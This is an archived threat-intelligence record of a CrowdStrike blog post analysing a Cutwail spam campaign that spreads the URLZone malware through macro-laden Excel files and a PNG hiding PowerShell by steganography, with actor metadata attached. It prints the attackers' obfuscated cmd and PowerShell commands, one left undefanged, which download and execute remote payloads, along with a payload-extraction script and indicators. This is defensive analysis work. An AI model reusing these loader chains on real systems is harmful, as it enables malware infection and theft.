{
	"id": "e13a0666-927a-4050-8729-b9734c3f1e33",
	"created_at": "2026-04-06T00:14:50.974689Z",
	"updated_at": "2026-04-10T03:37:26.645988Z",
	"deleted_at": null,
	"sha1_hash": "3cd382662fa3853b903c27f54c76ad1df559d0c3",
	"title": "Cutwail Spam Campaign Uses Steganography to Distribute URLZone",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2004044,
	"plain_text": "Cutwail Spam Campaign Uses Steganography to Distribute URLZone\r\nBy sebeschbretstobexhar\r\nArchived: 2026-04-05 13:02:05 UTC\r\nCrowdStrike® CrowdStrike Falcon® Intelligence™ has observed a new Cutwail spam campaign from NARWHAL\r\nSPIDER on 24 October 2018. NARWHAL SPIDER is the adversary name designated by Falcon Intelligence for the\r\ncriminal operator of Cutwail version 2. NARWHAL SPIDER primarily provides spam services with a large customer base\r\nthat has included malware operators such as WIZARD SPIDER (developer of TrickBot), affiliates of BAMBOO SPIDER\r\n(developer of Panda Zeus), and many others including URLZone, Nymaim and Gozi ISFB. The targets and payloads\r\ndelivered through Cutwail spam campaigns are determined by the customers of NARWHAL SPIDER. The Japanese-language spam campaign uses a mixture of malicious PowerShell (PS) and steganography — a method of sending data in a\r\nconcealed format — to distribute the eCrime malware family URLZone (a.k.a. Bebloh). The Japanese-language emails\r\ncontain a malicious, macro-enabled Microsoft Excel attachment named with the pattern DOC2410201810{DIGIT[6]}.xls,\r\nand have a SHA256 hash of 54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e. A screenshot of this\r\nattachment is provided in Figure 1. The message body of the spam email is either blank or consists of the content provided\r\nin Table 1, which also lists the possible subject lines.\r\nTable 1. Cutwail Spam Campaign Details\r\nFigure 1. 
Screenshot of Malicious, Macro-enabled Microsoft Excel Document\r\nUpon opening the Excel document and\r\nenabling macros, the victim machine begins to run through the series of events detailed below.\r\nStage 1: Deobfuscation Routine\r\nThe embedded Visual Basic for Applications (VBA) code runs cmd.exe as shown below:\r\ncmd.exe /V:ON/C\"set lW=o.crm`VPx57^^l(SEX]L8{-Y=GZU:K%0B[9ia2eb*yftp_/T$j1'vdMF^|C\\Hwk^\u0026)WAIDn+}h4,sg6;3\r\nR\"\"ON\u0026\u0026for %9 in\r\n(15,2,70,82,45,78,78,47,71,24,10,23,32,42,22,7,15,17,13,50,53,50,68,50,64,46,70,50,62,78,76,78,78,78,47,71,19,16,10,23,78,32,42,40,43,37,\r\nset Rc=!Rc!!lW:~%9,1!\u0026\u0026if %9 geq 84 cmd /C!Rc:~-1334!\"\r\nThis command decodes and executes a second stage, which is a combination of another Windows batch command with a PS\r\ncommand.\r\nStage 2: Download Image File and Execute PowerShell Command\r\nStage 2 is shown below:\r\ncmd /CEchO/ $4G7=('M'+'ATh') ; $48X7= ('SystEm.T'+'Ex'+'T'+'.ENc'+'o'+'DIng'); .(\"{1}{0}\" -f'l','sa') ('a') (\"\r\n{0}{2}{1}\" -f'New','ct','-Obje');^^^\u0026(\"{0}{1}\"-f 'Add-T','ype') -AssemblyName \"System.Drawing\";${g}=^^^\u0026('a')\r\n(\"{4}{2}{1}{0}{3}\"-f '.Bi','ing','w','tmap','System.Dra')((^^^\u0026('a') (\"{0}{1}{3}{2}\" -f\r\n'Net.','We','t','bClien')).(\"{1}{0}\" -\r\nf'penRead','O').Invoke(\"https://images2.imgbox.com/ca/88/A2ZSlW6S_o.png\"));${O}=^^^\u0026('a') (\"{0}{1}\"-\r\nf'Byte','[]') 1860;(0..2)^^^|.('%'){foreach(${x} in(0..619)){${p}=${g}.(\"{0}{1}\" -f\r\n'GetPi','xel').Invoke(${x},${_});${o}[${_}*620+${X}]=( $4g7::(\"{1}{0}\"-f 'loor','F').Invoke((${p}.\"B\"-\r\nband15)*16)-bor(${p}.\"g\" -band 15))}};^^^\u0026(\"{0}{1}\" -f'I','EX')( ( LS vARIabLE:48x7\r\n).ValUE::\"a`scii\".\"get`s`TrInG\"(${O}[0..1341])) |c:\\wIndOws\\SyStem32\\CliP.ExE \u0026\u0026CMd.Exe /c powerSHELL 
-\r\nExeCUTIONpOl BYPass -NoniN -wIndOwSTY HIDDEn -nOpROFi -st -NolOgO . ( \\\"{0}{1}{2}\\\" -f 'Add',( \\\"{0}{1}\\\" -f'-\r\n','Typ' ),'e' ) -Assem (\\\"{3}{1}{5}{0}{4}{2}\\\" -f ( \\\"{2}{1}{0}\\\" -f'd','.Win','em' ),'ys','s','S',( \\\"{2}{1}\r\n{0}\\\"-f 'Form','.','ows'),'t') ; ^^^\u0026 ( ${e`NV`:cOMs`pec}[4,15,25]-jOIN'') ( ( ::(\\\"{0}{1}\\\" -f 'G',(\\\"{0}{1}\\\"\r\n-f'e','ttExT' )).\\\"i`Nv`oKE\\\"( ) ) ) ; ::(\\\"{0}{1}\\\" -f'Cl','ear' ).\\\"i`NvO`kE\\\"( )\r\nThe PS command provided above results in the following sequential actions:\r\nDownloads an image and decodes a third stage (detailed below)\r\nCopies stage 3 to the clipboard\r\nExecutes PS command to initiate stage 3\r\nThe stage 2 PS command downloads a PNG file from the URL https://images2.imgbox[.]com/ca/88/A2ZSlW6S_o.png.\r\nThe downloaded image has the SHA256 hash 73da11127aa1da5538d153ba7f063c74fb90af46da581f098f179e1bb8371904 and\r\nis shown below:\r\nFigure 2. Screenshot of Downloaded Image File with Steganography to Hide the Payload\r\nNext, the command decodes\r\nhidden data using digital steganography from the image. The information is hidden in the blue (B) and green (G) channels of\r\nthe image. 
To be more exact, the four least significant bits of the blue and green channels contain another PS script (stage 3).\r\nThe four bits from the blue channel form the most significant bits of the data, and the four bits from the green channel form\r\nthe least significant bits to produce the full byte of the output, as shown below:\r\nThe following Python code extracts the PowerShell command from the image:\r\nfrom PIL import Image\r\nimport sys\r\n\r\n# Stage 3 lives in the low 4 bits of the blue and green channels of the first three\r\n# pixel rows (620 pixels wide): blue nibble = high 4 bits, green nibble = low 4 bits.\r\nimage = Image.open(sys.argv[1]).convert(\"RGB\")  # drop any alpha channel\r\npixel = image.load()\r\npayload = bytearray()\r\nfor y in range(3):\r\n    for x in range(620):\r\n        r, g, b = pixel[x, y]\r\n        payload.append((b \u0026 15) * 16 | (g \u0026 15))\r\nprint(payload.decode(\"ascii\", errors=\"replace\"))\r\nThe stage 3 PS command is hidden in the first three rows of the image. The following image shows detail of the original\r\nimage, with the red channel removed for better visibility. It demonstrates the use of steganography: the first three rows\r\nhave visibly lower entropy than the rest of the image.\r\nFigure 3. Image Showing the Blue and Green Color Channels for the Downloaded Image Containing a Hidden PowerShell Command\r\nin the First Three Rows\r\nNext, the decoded stage 3 PS command is copied to the clipboard and executed. To that end, another instance of\r\npowershell.exe is spawned by stage 2. The new PS command copies the content of the clipboard and executes it. 
Finally,\r\nthe clipboard content is cleared.\r\nStage 3: Further PowerShell Activity\r\nThe PS command in stage 3 is also highly obfuscated; a deobfuscated version is shown below:\r\n$Ds = Get-Culture | Format-List -Property * | Out-String -Stream;\r\nif ($Ds -Match \"ja\") {\r\n    $urls = \"http[:]//pigertime[.]com/mksettting\", \"\";\r\n    foreach ($url in $urls) {\r\n        Try {\r\n            Write-Host $url;\r\n            $fp = \"$env:temp\\pain.exe\";\r\n            Write-Host $fp;\r\n            $wc = New-Object System[.]Net.WebClient;\r\n            $wc.Headers.Add(\"user-agent\", \"Mozilla/5.0 (Windows NT; Windows NT 10.0; us-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6\");\r\n            $wc.DownloadFile($url, $fp);\r\n            Start-Process $fp;\r\n            break\r\n        } Catch {\r\n            Write-Host $_.Exception.Message\r\n        }\r\n    }\r\n}\r\nThe obfuscated PS command first checks whether the current region settings contain the string ja. This is most likely a\r\nsuperficial regional check for the Japanese region. If this is the case, the victim machine makes an HTTP GET request to the\r\nURL http[:]//pigertime[.]com/mksettting with the user agent Mozilla/5.0 (Windows NT; Windows NT 10.0; us-US)\r\nAppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6. The payload is downloaded to\r\n%TEMP%\\pain.exe and executed. 
The downloaded payload has the SHA256 hash\r\n03fe36e396a2730fa9a51c455d39f2ba8168e5e7b1111102c1e349b6eac93778 and is a variant of the eCrime malware\r\ndownloader URLZone.\r\nURLZone\r\nThe observed variant of URLZone uses the command-and-control (C2) server https://oaril[.]com/auth/ and the\r\npublic key provided below:\r\n-----BEGIN PUBLIC KEY-----\r\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCmk6zOuYcUd1H6vUyvuxrcozqW\r\nmOl5jTa9HDodiKaPtRPmNv2rRPF/4urX476F+SM6kmLcG04lnE3bEAQzO+kJJx8x\r\ngmxESN8piJ3aSxnjAqpt3rVjmwXmoULE1wnOFCKt32UmfZ7xNaPeYJyLvgcfGMme\r\nMGuPDjhqw5LmxzzSjwIDAQAB\r\n-----END PUBLIC KEY-----\r\nFollowing the successful installation of URLZone, the C2 server provides a URL from which a further malicious\r\npayload is downloaded and executed. Although Falcon Intelligence has yet to observe the final payload delivered, the previous Japanese-language spam\r\ncampaigns that delivered URLZone resulted in the download of Gozi ISFB. It should be noted that CrowdStrike Falcon® is\r\nable to leverage the behavioral pattern described in this blog and provides coverage against this threat. In addition, the\r\nFalcon machine learning algorithm is able to detect and prevent the URLZone payload from executing. Cutwail spam levels\r\nin the last three months have been significantly lower. The introduction of steganography may suggest that NARWHAL\r\nSPIDER has been developing new, innovative methods to evade detection and improve infection rates. 
Although not\r\ncommonly used by eCrime actors, steganography has been used for malware delivery in the past, such as the Lurk\r\nDownloader and StegoLoader.\r\nLearn more:\r\nTo learn more about how to incorporate intelligence on threat actors such as NARWHAL SPIDER into your security\r\nstrategy, please visit the Falcon threat intelligence product page.\r\nSource: https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"ETDA"
	],
	"references": [
		"https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/"
	],
	"report_names": [
		"cutwail-spam-campaign-uses-steganography-to-distribute-urlzone"
	],
	"threat_actors": [
		{
			"id": "c91f7778-69aa-45fa-be0e-4ee33daf8fbd",
			"created_at": "2023-01-06T13:46:39.110148Z",
			"updated_at": "2026-04-10T02:00:03.216613Z",
			"deleted_at": null,
			"main_name": "NARWHAL SPIDER",
			"aliases": [
				"GOLD ESSEX",
				"TA544",
				"Storm-0302"
			],
			"source_name": "MISPGALAXY:NARWHAL SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "03a8107a-f669-41af-ba79-41b1cbdc4654",
			"created_at": "2023-01-06T13:46:39.228649Z",
			"updated_at": "2026-04-10T02:00:03.25247Z",
			"deleted_at": null,
			"main_name": "BAMBOO SPIDER",
			"aliases": [],
			"source_name": "MISPGALAXY:BAMBOO SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f6f91e1c-9202-4497-bf22-9cd5ef477600",
			"created_at": "2023-01-06T13:46:38.86765Z",
			"updated_at": "2026-04-10T02:00:03.12735Z",
			"deleted_at": null,
			"main_name": "WIZARD SPIDER",
			"aliases": [
				"TEMP.MixMaster",
				"GOLD BLACKBURN",
				"DEV-0193",
				"UNC2053",
				"Pistachio Tempest",
				"DEV-0237",
				"Storm-0230",
				"FIN12",
				"Periwinkle Tempest",
				"Storm-0193",
				"Trickbot LLC"
			],
			"source_name": "MISPGALAXY:WIZARD SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e",
			"created_at": "2024-06-04T02:03:07.799286Z",
			"updated_at": "2026-04-10T02:00:03.606456Z",
			"deleted_at": null,
			"main_name": "GOLD BLACKBURN",
			"aliases": [
				"ITG23 ",
				"Periwinkle Tempest ",
				"Wizard Spider "
			],
			"source_name": "Secureworks:GOLD BLACKBURN",
			"tools": [
				"BazarLoader",
				"Buer Loader",
				"Bumblebee",
				"Dyre",
				"Team9",
				"TrickBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "cc045f52-bbdb-4fcc-8fbf-a0d8a7c5e64f",
			"created_at": "2022-10-25T16:07:24.519535Z",
			"updated_at": "2026-04-10T02:00:05.019918Z",
			"deleted_at": null,
			"main_name": "Narwhal Spider",
			"aliases": [
				"Gold Essex",
				"Storm-0302"
			],
			"source_name": "ETDA:Narwhal Spider",
			"tools": [
				"Cutwail",
				"Pushdo"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "956fc691-b6c6-4b09-b69d-8f007c189839",
			"created_at": "2025-08-07T02:03:24.860251Z",
			"updated_at": "2026-04-10T02:00:03.656547Z",
			"deleted_at": null,
			"main_name": "GOLD ESSEX",
			"aliases": [
				"Narwhal Spider ",
				"Storm-0302 ",
				"TA544 "
			],
			"source_name": "Secureworks:GOLD ESSEX",
			"tools": [
				"Cutwail",
				"Pony",
				"Pushdo"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "63061658-5810-4f01-9620-7eada7e9ae2e",
			"created_at": "2022-10-25T15:50:23.752974Z",
			"updated_at": "2026-04-10T02:00:05.244531Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"Wizard Spider",
				"UNC1878",
				"TEMP.MixMaster",
				"Grim Spider",
				"FIN12",
				"GOLD BLACKBURN",
				"ITG23",
				"Periwinkle Tempest",
				"DEV-0193"
			],
			"source_name": "MITRE:Wizard Spider",
			"tools": [
				"TrickBot",
				"AdFind",
				"BITSAdmin",
				"Bazar",
				"LaZagne",
				"Nltest",
				"GrimAgent",
				"Dyre",
				"Ryuk",
				"Conti",
				"Emotet",
				"Rubeus",
				"Mimikatz",
				"Diavol",
				"PsExec",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "dcba8e2b-93e0-4d6e-a15f-5c44faebc3b1",
			"created_at": "2022-10-25T16:07:23.816991Z",
			"updated_at": "2026-04-10T02:00:04.758143Z",
			"deleted_at": null,
			"main_name": "Lurk",
			"aliases": [],
			"source_name": "ETDA:Lurk",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3",
			"created_at": "2022-10-25T16:07:24.422115Z",
			"updated_at": "2026-04-10T02:00:04.983298Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"DEV-0193",
				"G0102",
				"Gold Blackburn",
				"Gold Ulrick",
				"Grim Spider",
				"ITG23",
				"Operation BazaFlix",
				"Periwinkle Tempest",
				"Storm-0230",
				"TEMP.MixMaster",
				"Wizard Spider"
			],
			"source_name": "ETDA:Wizard Spider",
			"tools": [
				"AdFind",
				"Agentemis",
				"Anchor_DNS",
				"BEERBOT",
				"BazarBackdoor",
				"BazarCall",
				"BazarLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"Conti",
				"Diavol",
				"Dyranges",
				"Dyre",
				"Dyreza",
				"Dyzap",
				"Gophe",
				"Invoke-SMBAutoBrute",
				"KEGTAP",
				"LaZagne",
				"LightBot",
				"PowerSploit",
				"PowerTrick",
				"PsExec",
				"Ryuk",
				"SessionGopher",
				"TSPY_TRICKLOAD",
				"Team9Backdoor",
				"The Trick",
				"TheTrick",
				"Totbrick",
				"TrickBot",
				"TrickLoader",
				"TrickMo",
				"Upatre",
				"bazaloader",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1f679d2e-c5c9-49e9-b854-2eca06a870e4",
			"created_at": "2022-10-25T16:07:24.453427Z",
			"updated_at": "2026-04-10T02:00:04.997515Z",
			"deleted_at": null,
			"main_name": "Bamboo Spider",
			"aliases": [
				"Bamboo Spider",
				"TA544"
			],
			"source_name": "ETDA:Bamboo Spider",
			"tools": [
				"AndroKINS",
				"Bebloh",
				"Chthonic",
				"DELoader",
				"Dofoil",
				"GozNym",
				"Gozi ISFB",
				"ISFB",
				"Nymaim",
				"PandaBanker",
				"Pandemyia",
				"Sharik",
				"Shiotob",
				"Smoke Loader",
				"SmokeLoader",
				"Terdot",
				"URLZone",
				"XSphinx",
				"ZLoader",
				"Zeus OpenSSL",
				"Zeus Panda",
				"Zeus Sphinx",
				"ZeusPanda",
				"nymain"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434490,
	"ts_updated_at": 1775792246,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3cd382662fa3853b903c27f54c76ad1df559d0c3.pdf",
		"text": "https://archive.orkl.eu/3cd382662fa3853b903c27f54c76ad1df559d0c3.txt",
		"img": "https://archive.orkl.eu/3cd382662fa3853b903c27f54c76ad1df559d0c3.jpg"
	}
}